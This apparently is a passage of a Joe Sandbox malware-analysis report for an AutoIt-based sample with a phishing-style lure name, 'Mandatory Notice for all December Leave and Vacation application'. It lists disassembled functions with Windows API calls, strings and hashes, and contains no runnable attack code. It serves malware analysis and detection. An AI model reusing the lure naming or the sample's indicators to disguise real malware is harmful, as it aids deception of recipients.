                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 2391506597-2584243854
                                                      • Opcode ID: b863f5382554fb04a2ea5ba797ddca375a5b610fa84570e55f5ba7bb3386c773
                                                      • Instruction ID: e62d641b7d6921d24f286b3740789fa03ad43dec160d91606e27c24cbe33f71e
                                                      • Opcode Fuzzy Hash: b863f5382554fb04a2ea5ba797ddca375a5b610fa84570e55f5ba7bb3386c773
                                                      • Instruction Fuzzy Hash: 83216D71A00218ABCF10EFA5DC82EEE77B5BF45740F04046AF505EF281DA78E945EBA5
                                                      Function 00FE93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FE945C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FE9467
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: cd4e082ebdd5f6cf4a50c1767de050f59132800f3f7b04c531f4bb266ada2c2c
                                                      • Instruction ID: b0d3e5155da0f772e56d20204a814ed46aae09a0d750a58439d7f5dd48502252
                                                      • Opcode Fuzzy Hash: cd4e082ebdd5f6cf4a50c1767de050f59132800f3f7b04c531f4bb266ada2c2c
                                                      • Instruction Fuzzy Hash: 2C11B671704248AFEF21DE55DC80EBB376EEB483B4F104125F954972D0D6759C529770
                                                      Function 00FE98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FE9968
                                                      • GetSysColor.USER32(00000012), ref: 00FE9982
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 0a95000bd50a55d402f058bcd1a4c62eed84d8ebec196ea175eb857546cfce72
                                                      • Instruction ID: 2a71d6c6d4f45a4264644e89bcc410b3a2d8d7f782cd4196a1fd4c69f8eebe0f
                                                      • Opcode Fuzzy Hash: 0a95000bd50a55d402f058bcd1a4c62eed84d8ebec196ea175eb857546cfce72
                                                      • Instruction Fuzzy Hash: F7116A72510209AFDB15DFB8CC45AEE7BA8FB08314F004618FD95D3151E775E850DB60
                                                      Function 00FE9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00FE9699
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FE96A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 78961de2ff39a87b4f59c152db0750f4f8328fd580644e8fccf49f5ce518f8ae
                                                      • Instruction ID: cd83a96c98d72bccc7cefb1cc2ad9d2174dbd188a7138ebc26b84c99caf2cd48
                                                      • Opcode Fuzzy Hash: 78961de2ff39a87b4f59c152db0750f4f8328fd580644e8fccf49f5ce518f8ae
                                                      • Instruction Fuzzy Hash: 6611C172904148ABEF218FA5DC40EEB3769EB05378F100315F964971E0C7B6DC50A770
                                                      Function 00FC5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC52D5
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FC52F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 24f1724a393531f9e71cb700941dfa56a6a1775f7f1592e1a7b2d798e99a6ab6
                                                      • Instruction ID: 3ba88ce4c9bf11469b3428139391681de1638f55e3196726eac107feed826cb0
                                                      • Opcode Fuzzy Hash: 24f1724a393531f9e71cb700941dfa56a6a1775f7f1592e1a7b2d798e99a6ab6
                                                      • Instruction Fuzzy Hash: CD112676E00616ABDB20DA98DB42FDD77F9AB45B60F040019E842E7190D3B0FD88E790
                                                      Function 00FD4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FD4DF5
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FD4E1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 37ae9d75565373c1c0981c723e97ae85a68fdea1797598a19ff61c7034019c25
                                                      • Instruction ID: f24ec88943d4b32d4ca90cf1da35c1afd4d4fe2e62d6b7f0a23b53e7170846d1
                                                      • Opcode Fuzzy Hash: 37ae9d75565373c1c0981c723e97ae85a68fdea1797598a19ff61c7034019c25
                                                      • Instruction Fuzzy Hash: 3211A071901261BBDB258F91C889FFBFBAAFF06764F14822BF54596240E3706840E6F0
                                                      Function 00FDA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00FDA88B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: htonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 3832099526-2422070025
                                                      • Opcode ID: fd6ac7376a9773c9bdbe7c7590f1a4022434218558f092afd0face3eadb77109
                                                      • Instruction ID: 0e0a67255f411914ca82ec65ff375932a93e4e6f11fb6ebbc2b84721d39d9cb6
                                                      • Opcode Fuzzy Hash: fd6ac7376a9773c9bdbe7c7590f1a4022434218558f092afd0face3eadb77109
                                                      • Instruction Fuzzy Hash: BF012635600304ABCB21AFA4C886FA9B365FF44320F10841BF9159B3D1D735E801E756
                                                      Function 00FBB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FBB7EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: 14e56c4c561994d74e610c027358c9f5a1dd55d97f91f22a81737be3c672bbec
                                                      • Instruction ID: 40efa483f57f35a21832de7c18be1168e5debee928d6ceef1fe1f6d6da659037
                                                      • Opcode Fuzzy Hash: 14e56c4c561994d74e610c027358c9f5a1dd55d97f91f22a81737be3c672bbec
                                                      • Instruction Fuzzy Hash: 70012475601114ABCB04FBA4CC529FE33ADBF45310B14061DF462672C2EFB85808ABA0
                                                      Function 00FBB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FBB6EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: 747117e52be89519a83a9f66df2fc4da5a214caac5c4efde7b390fd3a646b8de
                                                      • Instruction ID: cae157984dd83bf9677bccbbf20af43c98a08750bc0baadfd5956b933ee7d0de
                                                      • Opcode Fuzzy Hash: 747117e52be89519a83a9f66df2fc4da5a214caac5c4efde7b390fd3a646b8de
                                                      • Instruction Fuzzy Hash: 0401A275A41008ABCB14FBA5CD53BFE73AD9F45344F14002DB542B7181EBA85E18ABF5
                                                      Function 00FBB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FBB76C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: cb3fdedcee4db16eaf125219a42c8e286ccc3e2edfe69d1031083eac71e5e730
                                                      • Instruction ID: 3ad70a87cacdefc5f5febe1064f162eb6b99023a15556e9d76080e61c3c6eac2
                                                      • Opcode Fuzzy Hash: cb3fdedcee4db16eaf125219a42c8e286ccc3e2edfe69d1031083eac71e5e730
                                                      • Instruction Fuzzy Hash: 2D01D176A41104ABCB10FBA5CD02FFE73AC9F45344F240019B842B3192EFA85E09ABB5
                                                      Function 00FC7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 4ca3046e44f118034074deb1366af3f83bf1efc6474690ff6d8e41fd1340738c
                                                      • Instruction ID: c3e4638452602f12f13dc0ba091bd996fa0fd101e89ef5f827913a0920f5bf7e
                                                      • Opcode Fuzzy Hash: 4ca3046e44f118034074deb1366af3f83bf1efc6474690ff6d8e41fd1340738c
                                                      • Instruction Fuzzy Hash: BCE02277A003282BD720AAE5DC4AE87FBACBB95760F00001AB944E7041D664E60087E0
                                                      Function 00FBA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FBA63F
                                                        • Part of subcall function 00FA13F1: _doexit.LIBCMT ref: 00FA13FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 86e0f548764cee5c7384a9bf2e602cf1b117befbb72838d473f910d9acf10d61
                                                      • Instruction ID: 069821f928a43b042777933016363c176931f9c1696614ae402da529e7eb04ab
                                                      • Opcode Fuzzy Hash: 86e0f548764cee5c7384a9bf2e602cf1b117befbb72838d473f910d9acf10d61
                                                      • Instruction Fuzzy Hash: F0D05B313C432833D61536D97C1BFC5774C9B15BA1F044016BB48995C249DBD54063E9
                                                      Function 00FFAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00FFACC0
                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FFAEBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: DirectoryFreeLibrarySystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 510247158-3257408948
                                                      • Opcode ID: 7ceeb340efe556ba49764f0295136faaecf12315765e377eaad385bbb31f6a02
                                                      • Instruction ID: c076de7463f6634936813da4e1310f28b4d5c5bdc7cc05e7dc67fcd804015672
                                                      • Opcode Fuzzy Hash: 7ceeb340efe556ba49764f0295136faaecf12315765e377eaad385bbb31f6a02
                                                      • Instruction Fuzzy Hash: 3BE030B1C001499FCB12DBA4D944AECB7B8AF58300F148082E156B2160DB359A44EF21
                                                      Function 00FE86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE86E2
                                                      • PostMessageW.USER32(00000000), ref: 00FE86E9
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: dbc903991bba079056f0ec5ca402bc51e0a97acdb140ec133d7f3a188371b32e
                                                      • Instruction ID: 9b41c667252e41ae7b8aac0b8681efcc398521d4008b1567376a8b5c8b16e43b
                                                      • Opcode Fuzzy Hash: dbc903991bba079056f0ec5ca402bc51e0a97acdb140ec133d7f3a188371b32e
                                                      • Instruction Fuzzy Hash: 9ED0C9317853146BE27967B19C4BFC67A18AB49B11F100819B685AA1C4C9AAA9408B64
                                                      Function 00FE8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FE86A2
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FE86B5
                                                        • Part of subcall function 00FC7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 8e22719ed7ab28e773eb8d395884c7a526328b4d6231bef1723636697d6bbf29
                                                      • Instruction ID: e96ff675e46959ff3f00d18f37090fa8714dad023f01f28c5b10878b71dce526
                                                      • Opcode Fuzzy Hash: 8e22719ed7ab28e773eb8d395884c7a526328b4d6231bef1723636697d6bbf29
                                                      • Instruction Fuzzy Hash: 87D01231798314BBE37977F19C4FFC67A18AB44B11F100819B789AE1C4C9EAE940CB64